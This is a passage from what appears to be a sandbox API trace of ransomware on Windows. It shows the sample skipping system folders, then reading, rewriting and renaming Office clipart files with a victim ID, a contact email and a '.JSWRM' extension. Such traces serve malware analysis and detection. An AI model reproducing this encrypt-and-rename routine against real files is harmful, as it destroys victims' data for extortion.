lpString2="$RECYCLE.BIN") returned 1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="system volume information") returned -1 [0082.039] lstrcmpiW (lpString1="J0107300.WMF", lpString2="msocache") returned -1 [0082.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0082.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107300.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107300.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107300.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0082.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0082.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107300.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107300.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107300.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0082.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0082.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.039] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.040] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2460) returned 1 [0082.040] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x990) returned 0x20c6c0 [0082.040] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x990, lpOverlapped=0x0) returned 1 [0082.041] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.042] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x990, lpOverlapped=0x0) returned 1 [0082.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0082.042] CloseHandle (hObject=0x314) returned 1 [0082.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0082.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0082.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0082.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0082.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0082.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0082.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0082.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0082.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.043] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1028, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107302.WMF", cAlternateFileName="")) returned 1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2=".") returned 1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="..") returned 1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="...") returned 1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="windows") returned -1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="recovery") returned -1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="perflogs") returned -1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="documents and settings") returned 1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="system volume information") returned -1 [0082.043] lstrcmpiW (lpString1="J0107302.WMF", lpString2="msocache") returned -1 [0082.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0082.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107302.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107302.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107302.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0082.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0082.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107302.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107302.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107302.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0082.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0082.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0082.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0082.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.044] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4136) returned 1 [0082.044] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1020) returned 0x23fc98 [0082.044] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x1020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x1020, lpOverlapped=0x0) returned 1 [0082.121] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.121] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x1020, lpOverlapped=0x0) returned 1 [0082.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.122] CloseHandle (hObject=0x314) returned 1 [0082.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0082.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0082.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0082.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0082.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0082.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0082.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.122] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0082.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0082.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0082.123] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3e10, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107308.WMF", cAlternateFileName="")) returned 1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2=".") returned 1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="..") returned 1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="...") returned 1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="windows") returned -1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="recovery") returned -1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="perflogs") returned -1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="documents and settings") returned 1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="system volume information") returned -1 [0082.123] lstrcmpiW (lpString1="J0107308.WMF", lpString2="msocache") returned -1 [0082.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0082.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107308.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107308.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107308.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0082.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0082.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107308.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107308.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107308.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0082.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0082.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.124] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15888) returned 1 [0082.124] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3e10) returned 0x24d210 [0082.124] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3e10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3e10, lpOverlapped=0x0) returned 1 [0082.127] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.127] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3e10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3e10, lpOverlapped=0x0) returned 1 [0082.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.127] CloseHandle (hObject=0x314) returned 1 [0082.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0082.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0082.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0082.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0082.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0082.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0082.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107308.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107308.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0082.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0082.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.128] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a64, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107314.WMF", cAlternateFileName="")) returned 1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2=".") returned 1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="..") returned 1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="...") returned 1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="windows") returned -1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="recovery") returned -1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="perflogs") returned -1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="documents and settings") returned 1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.128] lstrcmpiW (lpString1="J0107314.WMF", lpString2="system volume information") returned -1 [0082.129] lstrcmpiW (lpString1="J0107314.WMF", lpString2="msocache") returned -1 [0082.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107314.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107314.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107314.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107314.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107314.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107314.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0082.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 